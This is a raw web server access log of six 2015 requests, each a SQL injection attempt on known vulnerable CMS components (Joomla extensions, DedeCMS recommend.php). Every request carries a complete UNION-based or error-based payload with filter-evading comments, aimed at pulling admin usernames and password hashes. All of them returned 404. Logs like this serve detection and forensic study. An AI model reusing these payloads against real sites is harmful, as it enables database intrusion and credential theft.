194.6.233.33 - - [15/Apr/2015:06:59:29 -0700] "GET /index.php?option=com_myblog&category=aca%27%20/*!union*//**//*!select*/%20group_concat(username,0x3a,password,0x3a,usertype)%20from%20jos_users%20where%20usertype=%27Super%20Administrator%27%20--%20%27 HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11"  "1"
194.6.233.33 - - [15/Apr/2015:06:59:29 -0700] "GET /index.php?option=com_tag&controller=tag&task=add&tmpl=component&article_id=9876543210+union+select+concat_ws(0x3a,username,password,usertype)+from+jos_users+where%20usertype=0x53757065722041646d696e6973747261746f72 HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11"  "1"
194.6.233.33 - - [15/Apr/2015:06:59:29 -0700] "GET /index.php?option=com_aist&view=vacancylist&contact_id=1+union+select+1,2,3,4,group_concat(username,0x3a,password,0x3a,usertype),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users-- HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11"  "1"
221.178.186.9 - - [30/Oct/2015:17:43:57 -0700] "GET /plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C%27%60+&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294 HTTP/1.1" 404 295 "-" "-"  "1"
221.178.186.9 - - [30/Oct/2015:17:43:58 -0700] "GET /plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C%27%60+&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294 HTTP/1.1" 404 239 "-" "-"  "1"
117.21.176.66 - - [05/Nov/2015:01:29:02 -0800] "GET /news/html/?0'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html HTTP/1.1" 404 239 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"  "1"
